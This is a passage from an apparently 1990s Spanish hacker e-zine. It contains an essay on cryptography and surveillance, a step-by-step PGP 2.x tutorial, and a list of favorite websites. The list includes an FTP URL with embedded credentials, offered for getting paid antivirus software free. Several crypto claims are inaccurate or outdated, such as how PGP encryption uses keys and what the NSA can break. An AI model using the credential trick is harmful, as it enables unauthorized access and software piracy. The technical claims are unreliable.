temblar de miedo a los administradores de sistemas...RareGaZz]

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=


% % % % % % % % % % % % % % % %
% %
% Criptografia %
% y sus %
% Multiples Beneficios %
% %
% % % % % % % % % % % % % % % %

Por: KillerBot

~Cryptografia para las Masas~
-Phil Zimmerman

La criptografia consiste en la codificacion de caracteres de tal forma que
puedan ser decodificados solamente por el conocedor de la clave con la que
se codificaron los caracteres o el poseedor del hardware necesario para
des-codificar los caracteres.
En la segunda guerra mundial el ejercito Estadounidense logro descifrar los
mensajes que enviaban los submarinos a tierra logrando asi conocer sus
posiciones especificas y poder atacarlos. Despues de finalizada la guerra
los Estadounidenses vendieron las maquinas codificadoras a paises como India,
Francia, etc. conociendo asi todas las comunicaciones de esos paises.
Las agencias de todo el mundo para prevenir que Hackers logren el acceso a
informacion clasificada han encriptado sus documentos y restringido todo
tipo de encripcion que ellos no puedan descifrar. Desgraciadamente parece
que los gobiernos no desean que exista privacidad entre las comunicaciones,
usando tecnicas tan antiguas como la intervencion de telefonos hasta lo mas
nuevo que es romper algoritmos criptograficos para conocer cualquier
comunicacion por vias electronicas. La encripcion esta catalogada por el
gobierno americano como municiones por lo que es prohibida su exportacion
a menos de ser un algoritmo debil que pueda ser descifrado por ellos.

Ataque TEMPEST
~~~~~~~~~~~~~~
Los monitores que usamos comunmente en las computadoras de escritorio son
los viejos Tubos de Rayos Catodicos (CRT) a pesar de existir ahora algunos
con tecnologia mejor pero han sido descontinuados del mercado por las trabas
que el gobierno ha puesto a la imposicion de esta tecnologia. El ataque
TEMPEST consiste el leer los caracteres que aparecen en tu monitor gracias a
la emision de ondas RF que todos los monitores emiten. Esta forma de
invasion es usada algunas veces por el gobierno estadounidense para espiar
monitores y ver toda la informacion que el investigado haga aparecer en su
pantalla.
Este ataque no ha sido ampliamente difundido por la dificultad de leer otros
dispositivos como el teclado, impresora, scanners, etc. De cualquier manera
cualquier John Doe con un poco de conocimientos de electronica y sobre ondas
de radio puede crear un lector de ondas RF y leer tu monitor y en algunos
casos hasta monitorear cada tecla presionada en tu teclado.

Encripcion
~~~~~~~~~~
Ok. Ya quedo claro que el unico modo de defendernos es la encripcion pero
que tan segura es?

Si tu piensas que el mundo de los hackers esta hundido en prejuicios, apuesto
a que desearias hablar con un cripto-analista.Esta gente son tradicionalmente
los mas grandes hoyos en los que he puesto mis ojos. En su mente esta gente
ha estado debatiendo los conceptos de la encripcion desde tiempos remotos y
si tu apareces con un metodo totalmente nuevo de encripcion de datos -TU
ESTAS INSULTANDO A TODOS LOS QUE HAN HECHO ENCRIPCION-. Simplemente por decir
"Oh, Se me ocurrio una idea para encriptar que puede ser una de las mejores
hasta la fecha"
cuando la gente ha dedicado toda su vida a dise§ar y romper a
las tecnicas de encripcion -- asi que te hace pensar que eres tan brillante?
De cualquier forma, cripto-analistas tienden a aceptar todos los comentarios
como insultos y son facilmente ofendidos.

Casi todos los cripto-analistas coinciden en que el costo de horas hombre
asi como el tiempo que una supercomputadora tardaria en romper el codigo
a base de ataques de fuerza bruta haria incosteable el hecho de romper todos
los codigos de encripcion creados al hazar. Como un resultado de esto, las
regulaciones del gobierno han sido creadas.
La Agencia de Seguridad Nacional (NSA) estadounidense ha creado el algoritmo
DES (Data Encryption Standard) que es como su nombre lo dice, un estandard de
encripcion. Este metodo de encripcion es basicamente solido y toma un tiempo
largo para romperse.
DES si se puede quebrar, solo que toma un "tiempo inrazonable para quebrar".
El ataque hacia la palabra "inrazonable" continua haciendose mas fuerte cada
dia. Conectando algunas computadoras DEC'S en red y la velocidad actual de
las super-computadoras la longitud de tiempo se ha convertido en
"razonablemente" baja para quebrar un archivo encriptado con este sistema.
Obviamente DES era una iniciativa del gobierno para controlar la encripcion
y esperar que el publico se la tragara, pero las cosas no salieron como lo
esperaban y han sido quemados con criticas de todos los sectores. Su metodo
de encripcion resulto demasiado debil y su intento de invadir la privacidad
no resulto.

Metodos de Encripcion
~~~~~~~~~~~~~~~~~~~~~
El metodo convencional de encripcion se basa en un concepto muy sencillo,
encriptas con una clave y para recuperar el archivo en su forma original
haces el mismo proceso con la misma llave. Tu no revelas la clave a nadie en
que no confies y listo. Existen algunos programas que crean ciphertext y que
son considerados seguros y ademas ninguno de ellos usa el estandard DES lo
que no significa que sean imposibles de quebrar solo que no estan sometidos
a limitaciones como el maximo numeros de caracteres para contrase§as de 8
digitos. Estos metodos son: MDC, disponible en el paquete HPACK; e IDEA,
disponible en el paquete Pretty Good Privacy -- PGP

*Grupos politicos relacionados con la privacidad y libertad*


The Electronic Frontier Foundation (EFF)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Fue fundada en Julio de 1990 para asegurar la libertad de expresion en medios
digitales, con un enfoque particular en aplicar los principios legales
contenidos en la Constitucion sobre los derechos de las comunicaciones por
computadora.

Desde el principio, EFF estaba determinada a convertirse una organizacion que
combinara expertos en lo tecnico, legal y publico, y los aplicara cada vez que
un medio de comunicacion electronico aparezca.

Computer Professionals for Social Responsibility (CPSR)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
CPSR reune profesionales en computadoras y usuarios para difundir el uso
responsable de la informacion y tecnologia e invita a todos los que usen la
tecnologia de las computadoras a participar en debates publicos. Como una
organizacion de ciudadanos preocupados, CPSR dirigira la atencion publica a
las distintas decisiones que se relacionen con las aplicaciones de la
computacion y como esas decisiones afectan a la sociedad.

Preguntas y Respuestas relacionadas con criptografia.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
P. ®Es posible guardar secretos?
R. Entre mas grande sea una organizacion, lo dificil que sera guardar un
secreto.

P. ®Cual es el estatus legal de PGP contra RSA?
R. No se ha remediado el conflicto entre estos dos productos. El problema es
que PGP rompio la patente de el algoritmo de encripcion que le pertenece a
RSA. El programa RIPEM usa RSAREF, que es una version rebajada de RSA.
De hecho PGP ha sido rebajado en la version actual 2.6.2 y se ha cambiado
el algoritmo RSA por RSAREF.

P. ®Como se usan las firmas ciegas?
R. Las tarjetas de votacion, firmas digitales, dinero electronico, etc.

P. ®Puede la Agencia de Seguridad Nacional (NSA) de Estados Unidos de America
quebrar DES & PGP?
R. Desde luego. Tardarian como un dia en quebrar una llave de 512 bits.

[ Espero que cuando mandes cartas por correo tradicional las envuelvas
con un sobre...A poco no lo haces? Si no eres delincuente, terrorista o
tienes algo que esconder entonces ®Por que guardar cartas en sobre?
Seguramente esta pregunta se te hace tonta pero se me ha preguntado a mi
®Por que encriptas tus mensajes?...A mi tambien me parece tonta:-) Si todos
empezamos a usar tecnicas de encripcion para nuestros mensajes podriamos
lograr que no parezca sospechoso o paranoico la persona que use encripcion.]
-Phil Zimmerman en el manual de PGP

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

<><><><><><><><><><><><><><>
<> Que es PGP y <>
<> Cual es su importancia <>
<><><><><><><><><><><><><><>
KillerBot

"Toda tu propiedad privada es blanco para tu enemigo
y tu enemigo somos nosotros. Somos fuerzas del caos
y la anarquia. Somos todo lo que dicen que somos y
estamos orgullosos de nosotros mismos."

-Jefferson Airplane

En 1992 aparecio en la red un programa gratuito llamado Pretty Good Privacy
que significa Muy Buena Privacidad. Mejor conocido por sus siglas en ingles,
PGP permitia codificar achivos usando un algoritmo de encripcion llamado
RSA que permitia garantizar la privacidad del mensaje y ademas asegurar que
un mensaje solo pueda ser leido por la persona a la que esta destinado.

Los mensajes enviados usando PGP solo pueden ser vistos por la persona a la
que vaya dirigido el mensaje. Ademas, para enviarte un mensaje necesitan
contar con tu llave PGP publica.

PGP funciona de esta manera: cada usuario que necesita contar con su
computadora propia ya que almacenara en su disco duro 2 llaves necesarias
para llevar a cabo la encripcion y des-encripcion de los archivos.El usuario
necesitara contar con 2 llaves propias, la secreta y publica. Obviamente la
secreta debera estar bien almacenada en un diskette por seguridad y la
publica podra ser distribuida a sus conocidos. Para el manejo de las llaves
PGP cuenta con un llavero que permite visualizar las llaves almacenadas en
los archivos SECRING.PGP -El llavero con la llave secreta- y PUBRING.PGP -El
llavero con las llaves publicas-.

Si alguna persona desea mandarte un archivo encriptado, necesitara tu llave
publica y su llave secreta. Es decir, si yo quisiera mandarte un archivo para
que solo puedas leerlo tu tendria que decirle a mi programa PGP que usara tu
llave publica para decirle a mi llave secreta como encriptar el archivo para
que puedas des-encriptarlo.
Cualquier archivo encriptado usando tu llave publica solo podra ser leido
por ti lo que es una garantia en la seguridad.

Existen programas que permiten codificar y des-codificar archivos con una
clave numerica y solo los conocedores de esa clave podran ver los archivos.
Es uno de los sistemas mas simples de encripcion y tambien uno de los mas
inseguros. Este sistema necesita una forma de comunicacion segura por la que
se pueda transmitir la clave para llevar a cabo la encripcion y la des-
encripcion. Resulta tonto necesitar una forma de comunicacion segura para
transmitir la clave ya que si se cuenta con una forma de comunicacion segura
entonces para que diablos necesitan la encripcion? Nota: El correo
electronico * NUNCA * es una forma de comunicacion segura ya que cualquier
persona que haya obtenido derechos de SUPER USUARIO puede husmear el correo
electronico de cualquier usuario de ese servidor.

DONDE CONSEGUIR PGP (Legalmente)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Por ser PGP un sistema de encripcion controlado por el gobierno americano,
ninguna persona que no resida en los Estados Unidos Americanos puede tener
una copia para su uso (pero no dejes que esto te detenga).

Pasos y requisitos para obtener PGP

1.- Tener una cuenta de correo anonima. Si no tienes ninguna cuenta de correo
anonima dirigete a WWW.HOTMAIL.COM y selecciona la opcion "Sign Up Here"

2.- Llena la informacion y selecciona tu direccion X@hotmail.com donde X es
el login que tu eligas; selecciona una contrase§a {no uses ninguna que sea
comprometedora} y continua. Si aparece un error modifica tu Login y vuelve
a intentar.

3.- Ahora que ya tienes una direccion de e-mail anonima visita esta pagina:
http://bs.mit.edu:8001/pgp-form.html
-Contesta a todas las preguntas Y (yes)
-Deja la ultima pregunta (clave) en blanco y presiona SUBMIT
-Entraras a una pagina donde se te pregunta tu E-MAIL escribe la direccion
de la cuenta anonima que acabas de crear y presiona SUBMIT.

4.- Espera unos 10 minutos (maximo 24 horas), revisa tu e-mail en hotmail
y apunta la clave que te habra llegado de MIT.

5.- Regresa a la pagina http://bs.mit.edu:8001/pgp-form.html y contesta de
nuevo Y (yes) a las preguntas y apunta la clave que te llego a tu e-mail
en el ultimo campo. Presiona SUBMIT.

6.- Entraras a otra pagina y haz click en la version PGP seleccionando un
servidor cercano de donde estes.

Configurando PGP
~~~~~~~~~~~~~~~~
Para configurar tu copia de PGP deberas modificar el AUTOEXEC.BAT para
incluir las variables de tiempo y el path de PGP. En el siguiente ejemplo no
deberas incluir los comentarios:

SET TZ=PST8PDT <--Esto indica que use la hora de Los Angeles Ca.
SET PGPPATH=C:\PGP <--Esta variable indica donde esta instalado PGP

Una vez que hayas modificado el autoexec.bat crea un directorio en tu disco
y descomprime el archivo que contenga PGP en el directorio C:\PGP
Para ver la ayuda de el programa en espa§ol modifica la siguiente linea de
el archivo CONFIG.TXT
ORIGINAL
Language = en
MODIFICADO
Language = es

Para poder ejecutar PGP desde cualquier directorio deberas incluir el
directorio donde se encuentra el programa a tu linea PATH= en el archivo
autoexec.bat

Re-inicializa tu computadora.

Ahora que PGP ya esta instalado en tu computadora necesitaras crear tu llave
publica y secreta para que otros pueden encriptar mensajes para ti y tu
para ellos. Para crear tu par de llaves usa el comando:

C:\> pgp -kg { Comando para la generacion de llaves }
Pretty Good Privacy 2.1 - Public-key encryption for the masses.
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/18 19:53 GMT
______________________________________________________________________________
*Despues te pregunta cual sera la 'fuerza' de encripcion deseada y deberas
basarte en la siguiente tabla para decidir:

Computadora Fuerza de Encripcion Encripcion Velocidad
286 512 bits debil rapido
386 768 bits media medio
486 1024 bits super lento
______________________________________________________________________________

Pick your RSA key size:
1) 384 bits- Casual grade, fast but less secure
2) 512 bits- Commercial grade, medium speed, good security
3) 1024 bits- Military grade, very slow, highest security
Choose 1, 2, or 3, or enter desired number of bits: 3 {Fuerza Militar}
______________________________________________________________________________
*En la siguiente pregunta necesitaras escribir cual es la identificacion que
quieres que aparezca en tu llave publica, puede ser tu nombre, direccion de
correo electronico, etc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Generating an RSA key with a 1024-bit modulus...
You need a user ID for your public key. The desired form for this
user ID is your name, followed by your E-mail address enclosed in
<angle brackets>, if you have an E-mail address.
For example: John Q. Smith <12345.6789@compuserve.com>

Enter a user ID for your public key:
RareGaZz <RareGaZz@BIGFOOT.COM>
______________________________________________________________________________
*Ahora necesitaras escribir la contrase§a que deseas usar para poder ver los
mensajes que son encriptados para ti y para crear firmas de archivos. Deberas
escoger una contrase§a larga y caracteres numericos y ASCII. Ejemplo:

Enter pass phrase: vivia hace 23 :-) a§os en un rancho

Como puedes ver esta clave tiene bastantes caracteres por lo que puede ser
considerada una contrase§a segura; ademas es facil de recordar.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You need a pass phrase to protect your RSA secret key.
Your pass phrase can be any sentence or phrase and may have many
words, spaces, punctuation, or any other printable characters.
Enter pass phrase: { No aparece en la pantalla }
Enter same pass phrase again:{ " " " " " }
Note that key generation is a VERY lengthy process.
______________________________________________________________________________
*Ahora necesitas escribir algunos caracteres al hazar para generar tu llave.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We need to generate 105 random bytes. This is done by measuring the
time intervals between your keystrokes. Please enter some text on your
keyboard, at least 210 nonrepeating keystrokes, until you hear the beep:
1 .*
-Enough, thank you.
...................................................++++ ........++++
Key generation completed.
______________________________________________________________________________

PGP genero 2 llaves necesarias para el proceso de encripcion y se encuentran
en los archivos SECRING.PGP y PUBRING.PGP (Llave secreta - Llave publica)

Para ver el contenido de los llaveros usa el siguiente comando:

C:\> pgp -kv {comando para ver el llavero publico}
Pretty Good Privacy 2.1 - Public-key encryption for the masses.
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/18 20:19 GMT

Key ring: 'c:\pgp\pubring.pgp'
Type bits/keyID Date User ID
pub 1024/7C8C3D 1993/01/18 RareGaZz <RareGaZz@hotmail.com>
1 key(s) examined.

Ahora que ya tenemos las 2 llaves necesitaremos extraer nuestra llave publica
para que cualquier persona pueda encriptar mensajes y mandarnoslos. Para poder
hacer esto, necesitaremos mandarles nuestra llave publica por correo
electronico. Por eso, necesitaremos extraer la llave publica en formato ASCII;
esto se hace con el comando:

C:\> pgp -kxa "
raregazz"
Pretty Good Privacy 2.1 - Public-key encryption for the masses
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/18 20:56 GMT

Extracting from key ring: 'c:\pgp\pubring.pgp', userid "
RareGaZz
<RareGaZz@BIGFOOT.COM>"

Key for user ID: RareGaZz <RareGaZz@hotmail.com>
1024-bit key, Key ID 0C975F, created 1993/01/18

Extract the above key into which file? llave {Deberas escribir un nombre}

Transport armor file: llave.asc

Key extracted to file 'llave.asc'. {Tu llave publica quedara en ese archivo}

El archivo llave.asc debe contener tu firma como el siguiente archivo:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1

mQA9AitgcOsAAAEBgMlGLWl8rub0Ulzv3wpxI5OFLRkx3UcGCGsi/y/Qg7nR8dwI
owUy65l9XZsp0MUnFQAFEbQlT25lIER1bWIgUHVkIDwxRHVtUHVkQG1haWxydXMu
Yml0bmV0Pg==
=FZBm
-----END PGP PUBLIC KEY BLOCK-----

COMUNICACION CON PGP
~~~~~~~~~~~~~~~~~~~~
Asumamos que alguien desea comunicarse contigo usando PGP. Para eso el te
envia su llave PGP:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1

mQCNAisuyi4AAAEEAN+cY6nUU+VIhYOqBfcc12rEMph+A7iadUi8xQJ00ANvp/iF
+ugZ+GP2ZnzA0fob9cG/MVbh+iiz3g+nbS+ZljD2uK4VyxZfu5alsbCBFbJ6Oa8K
/c/e19lzaksSlTcqTMQEae60JUkrHWpnxQMM3IqSnh3D+SbsmLBs4pFrfIw9AAUR
tCRUaGUgUmFja2V0ZWVyIDxyYWNrQGx5Y2FldW0uaGZjLmNvbT4=
=6rFE
-----END PGP PUBLIC KEY BLOCK-----

Ahora necesitas a§adir su llave a tu llavero de llaves publicas (PUBRING.PGP)
para hacer esto usas el comando:

C:\> pgp -ka llave.asc {donde llave.asc es el nombre del archivo con la llave}
Pretty Good Privacy 2.1 - Public-key encryption for the masses.
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/22 22:17 GMT

Key ring: 'c:\pgp\pubring.$01'
Type bits/keyID Date User ID
pub 384/C52715 1993/01/22 Whatever <whatever@email.address>

New key ID: C52715

Keyfile contains:
1 new key(s)
Adding key ID C52715 from file 'llave.asc' to key ring 'c:\pgp\pubring.pgp'.

Key for user ID: Whatever <whatever@email.address>
384-bit key, Key ID C52715, crated 1993/01/22
This key/userID associate is not certified.

Do you want to certify this key yourself (y/N)? N {mas sobre esto adelante}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ahora que ya tenemos a esta persona en nuestro llavero vamos a encriptar un
archivo para el unicamente.

C:\> pgp -e file.txt Whatever {Encripta FILE.TXT para Whatever}
Pretty Good Privacy 2.1 - Public-key encryption for the masses.
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/22 22:24 GMT


Recipient's public key will be used to encrypt.
Key for user ID: Whatever <whatever@email.address>
384-bit key, Key ID C52715, created 1993/01/22

WARNING: Because this public key is not certified with a trusted
signature, it is not known with high confidence that this public key
actually belongs to: "
Whatever <whatever@email.address>".

Are you sure you want to use this public key (y/N)? y
------------------------------------------------------------------------------

Cuando termine de encriptar el archivo FILE.TXT se creara el archivo FILE.PGP
que solo podra ser des-encriptado por Whatever. Si deseamos encriptar un
texto y borrarlo permanentemente usamos el mismo comando pero con la letra
'w' despues de la primera opcion:
PGP -ew file.txt whatever
Para crear el mensaje y que sea posible enviarlo por un correo e-mail sin
necesidad de pegarlo a el mensaje usa la opcion -a (ASCII)
PGP -ea file.txt whatever
y se creara FILE.ASC con el mensaje PGP

Certificando llaves
~~~~~~~~~~~~~~~~~~~
Cuando quieras a§adir una llave publica no certificada a tu llavero aparecera
el siguiente mensaje en tu pantalla:

Do you want to certify this key yourself (y/N)? N

Esto significa que no existe alguna manera de determinar que esa llave en
verdad pertenece a el usuario que te la mando. Certificar llaves significa
a§adir tu ID a esa llave para asegurar que esa llave pertenece a esa persona.

Si tu creas tu llave PGP puedes decirle a un amigo cercano que la certifique
y te la mande de regreso para que puedas tener tu una llave certificada por
otra persona.

Firmar Documentos o Archivos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Para verificar que un archivo no ha sido modificado es necesario crear una
firma electronica que pueda ser comparada con el archivo para saber si ha
sido alterado el archivo ya sea por una persona o virus. La ventaja de las
firmas electronicas con PGP es que nadie puede firmar un archivo o documento
con tu llave sin conocer tu clave y poseer tener tu llave secreta.

Firmar archivos Binarios
^^^^^^^^^^^^^^^^^^^^^^^^
En el siguiente ejemplo crearemos una firma de el archivo TEST.EXE que sera
firmada con la llave PGP de RareGaZz y podra ser verificada si se tiene la
llave PGP publica de RareGaZz en el llavero de la persona que trate de
verificar la firma.

pgp -sb TEST.EXE RAREGAZZ

Este comando generara un archivo llamado TEST.SIG que contiene la firma del
archivo TEST.EXE. Para verificar la firma se usa el siguiente comando:

pgp test.sig test.exe

Debera aparecer en pantalla el siguiente mensaje:
.
Good signature from user "
RareGaZz <RareGaZz@Bigfoot.Com>"
Signature made 1997/01/01 12:12 GMT

Si se quiere crear una firma y que sea salvada en formato ASCII para enviarla
por correo electronico se usaria el mismo comando con la opcion -a

pgp -sba TEST.EXE RAREGAZZ

Y en lugar de crearse test.sig se creara el archivo TEST.ASC Para verificar
esta firma se haria de la misma forma que en el ejemplo pasado sustituyendo
TEST.SIG por TEST.ASC

Firmar Documentos
^^^^^^^^^^^^^^^^^
Cuando haces una participacion a una lista de correo o a un grupo de
noticias la unica forma de saber que ese mensaje fue enviado por ti es
firmandolo con tu llave secreta para que cualquiera con tu llave publica
pueda verificar que no ha sido modificado.
Supongamos que deseamos firmar el archivo TEST.TXT con la firma de RareGaZz.
Para hacer esto usariamos el comando:

PGP -sta TEST.TXT RAREGAZZ

Este comando crearia el archivo TEST.ASC que contiene el texto y ademas una
firma que sirve para verificar que no haya sido modificado. Ahora ya se
podria borrar el archivo TEST.TXT y enviar TEST.ASC

Para verificar la firma se usaria el comando:

PGP TEST.ASC

Si la persona que quiere verificar la firma tiene en su llavero la llave
publica de RareGaZz entonces si no ha sido modificado el texto aparecera
el siguiente mensaje y se creara el archivo original TEST
.
Good signature from user "
RareGaZz <RareGaZz@Bigfoot.Com>"
Signature made 1997/01/01 12:12 GMT

Plaintext filename: test

-0- Paranoia Clinica -0-
~~~~~~~~~~~~~~~~~~~~~~~~
Supongamos que tu eres un narcotraficante y la privacidad es escencial en
tus comunicaciones. Actualmente existen aparatos que interceptan las
comunicaciones celulares y hasta las encriptadas son quebradas por expertos
en criptografia; las lineas telefonicas convencionales todos sabemos que
estan 'parchadas' en cada poste telefonico. Asi que ®cual es la alternativa
para obtener privacidad por el telefono?

PGPFone
^^^^^^^
Phil Zimmerman es un paranoico, esquizofrenico y hasta un poco zafado del
craneo que ha intentado dar privacidad a cualquier persona que la necesite
y por eso ha creado PGP y ahora PGPFone.
Si PGP no lo mete en la carcel, seguramente PGPFone lo hara!

No he investigado mucho sobre PGPFone pero se que la encripcion utilizada en
el programa es bastante fuerte y probablemente 'inquebrable'. Asi que, ya lo
saben, si tienen conversaciones cochinas por telefono como Marcela y un
politico mexicano mejor proteganse con encripcion...y aseguren su privacidad.

Disponible en:

http://web.mit.edu/network/pgpfone/


0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

<=><=><=><=><=><=><=><=><=>
<=> Los 10 <=>
<=> Mejores Websites <=>
<=> ~~~~~~~~~~~~~~~~ <=>
<=><=><=><=><=><=><=><=><=>

Texto original escrito por 'RareTrip' para RareGaZz

"
El experto es aquel que sabe mas y mas sobre menos
y menos hasta que sabe absolutamento todo acerca
de nada." Leyes de Murphy

______________________________________________________________________________
Website Http:// Servicios Ofrecidos Gratuitamente
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mercury Mail www.merc.com Whoa! Este website se merece 5 estrellas,
ofrece noticias sobre cualquier TOPICO de
interes desde deportes hasta lo mas
actualizado en noticias de Latinoamerica. Es
todo un WebSite de Noticias via e-mail, lo
unico que tienes que hacer es visitar el
website y seleccionar que temas deseas que
llegen a tu buzon cada semana. Puedes
seleccionar ediciones de distintas partes del
planeta y hasta noticias sobre el estado del
tiempo del lugar donde vives. Solo una
recomendacion: No te subscribas a cosas que no
necesitaras ya que solo atascaran tu buzon de
correo, lo ideal es subscribirte a los
siguientes reportes: U.S. Front Page Stories,
World Front Page Stories, The Americas
(latinoamerica) y si te gustan los deportes
puedes seleccionar sobre NBA, SKI, etc.

CNET www.cnet.com Aqui encontraras informacion sobre los nuevos
servicios en Internet. Ademas puedes
subscribirte a la lista de correo que cada mes
te manda a tu buzon de correo lo nuevo y una
comica lista 'TOP TEN'. Para subscribirte a
esta lista de correo manda un mensaje a
DISPATCH@CNET.COM con la siguiente linea de
texto en el mensaje:
subscribe [tu direccion e-mail]
ejemplo: subscribe midir@email.net

SHAREWARE www.shareware.com Es un Website de CNET que contiene casi todos
los programas shareware que hay en la red.
Esta equipado con una conveniente maquina de
busqueda de palabras claves. Si quieres estar
enterado de lo mas nuevo en Shareware puedes
subscribirte a la lista de correo recibiras en
tu buzon una lista con el software mas
reciente asi como una lista de los 10
programas mas populares. Para subscribirte
manda un mensaje a sw-dispatch@shareware.com
con la siguiente linea de texto en el mensaje:
subscribe shareware-dispatch [tu dir e-mail]
ej. subscribe shareware-dispatch midir@email.net

Who Where? www.spanish.whowhere.com
www.whowhere.com Este website funciona como un libro de
direcciones e-mail de Internet. Si buscas la
direccion e-mail de alguna persona solo
escribe su nombre en la maquina de busqueda y
si esta registrada aparecera su direccion e-
mail, su nombre, intereses y hasta su frase
favorita. Si deseas colaborar con esta labor
solo apunta tu visualizador a
www.spanish.whowhere.com y solicita
inscribirte en el directorio. Si no eres de
los que les gusta dar su direccion e-mail
por temor a ataques existe una opcion que te
permite 'esconder' tu direccion y solo
aparecera un Link para mandarte correo en
lugar de tu direccion.

Hotmail www.hotmail.com Este es un servidor que te permite crear una
cuenta de correo anonima basada en HTML. Si
deseas dar a conocer una direccion sin que
alguien pueda saber tu verdadera identidad
aqui es donde perteneces! Para ver tu correo
solo debes de escribir un Login y tu Password.
Para crear una cuenta selecciona un Link en la
pagina principal llamado 'SIGN UP' y tomate el
tiempo en llenar los campos de informacion que
piden. Este es un buen servicio pero con que
fin? Pues el de hacer una auditoria en el
web, ya que cada subscriptor debe llenar los
campos sobre su ingreso anual y su edad
etcetera. No recomendamos poner datos
verdaderos ni mucho menos tu nombre completo,
un nombre ficticio y datos al hazar no le
da§an la conciencia a nadie :) Por favor no te
pongas a crear mas de 2 cuentas pues hay gente
interesada en este servicio que queda fuera
debido a falta de espacio!

BIGFOOT www.bigfoot.com Este es un servicio de Re-mailer que te
permite crear una direccion 'Virtual' de
correo electronico solo que es indispensable
que ya tengas una cuenta legitima. Es util si
en tu casa diferentes personas comparten una
misma direccion e-mail, puedes unirte a
'Bigfoot for Life' y escribir el nombre de tu
direccion virtual con nombre de dominio
@bigfoot.com Cualquier mensaje mandado a una
cuenta bigfoot es mandado a tu cuenta de
correo legitima. Por ejemplo si en una familia
todos desean su direccion e-mail propia
podrian crear: HIJO@BIGFOOT.COM
MAMA@BIGFOOT.COM
PAPA@BIGFOOT.COM
Y cada quien daria su direccion a sus
amistades, de cualquier manera los mensajes
van a parar a la misma cuenta de email.

Proceso http://proceso.web.com.mx/
Te recomendamos visites su sitio para ver los
articulos que aparecen en el numero actual y
en el anterior. Encontraras los articulos
divididos en las secciones de: Reportajes,
Nacional, Analisis, Internacional, Cultura y
Deportes.

Geocities www.geocities.com Si sabes programar HTML y tienes un poco de
sentido comun en este Website podras colocar
tu HomePage absolutamente gratis. Cada
'ciudadano' de Geocities es propietario de un
megabyte de espacio para su pagina, si
acumulas puntos en sus diversos planes puedes
aumentar el espacio disponible. Ademas te dan
la oportunidad de crear una cuenta de e-mail
para usarla en tu pagina. Puedes usarla como
una direccion legitima accesible desde
cualquier programa de e-mail o puedes
especificar que sea mandada a otra direccion y
actue como re-mailer.

Wired www.wired.com Todo lo Hype sobre Internet en este website de
una revista no-electronica que trata sobre la
cultura en Internet, algunos denominan a esta
revista el 'Internet impreso'. Podras
subscribirte a varias listas de correo sobre
distintos temas. Algunos nombres de dominio
tambien de esta revista son: www.webmonkey.com
y la maquina de busqueda www.hotbot.com

Cruel www.cruel.com Si te gustan los rollos filosoficos y el humor
negro visita esta Website y encontraras un
Link distinto cada dia a una pagina cruel. Si
deseas visitar los links de dias pasados
visita 'our cruel heritage' y selecciona el
mes que quieras examinar.

McAfee www.mcafee.com Aqui podras bajar el popular programa SCAN de
McAfee que es actualizado cada mes. Para bajar
las actualizaciones solamente dirigete a:
www.mcafee.com/down/dat.html
Si deseas comprar la version registrada de
VirusScan puedes hacerlo en este WebSite, pero
si eres un tipico lector de RareGaZz desearas
usar tecnicas de Hackers para obtenerlo...Pues
bien, aqui esta el link para que puedas
acceder al programa registrado sin tener que
pagar ni un solo centavo:

ftp://licensed:321@ftp.mcafee.com/licensed/antivirus/
(Exclusiva de RareGaZz)

No sabemos por cuanto tiempo mas podras hacer
este Hack pero por lo pronto los editores y
colaboradores de esta revista ya lo tenemos y
esta Super!

F-Prot www.datafellows.com Aqui puedes ver los diferentes productos que
tiene esta compa§ia dedicada a los antivirus y
seguridad informatica. Para ir al lugar donde
puedes bajar la version mas actual de F-Prot
he aqui el URL para el navegador:
ftp://ftp.Datafellows.com/f-prot/free/
______________________________________________________________________________
rArEtRiP
